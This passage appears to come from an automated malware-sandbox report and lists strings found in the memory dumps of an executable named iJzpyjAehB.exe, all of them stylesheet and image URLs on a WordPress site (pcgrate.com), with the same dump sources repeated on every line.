                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1677257013
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1678274495
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1664959878
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=899328ee298e
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=899328ee298e
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=899328ee298e
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=899328ee298e
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 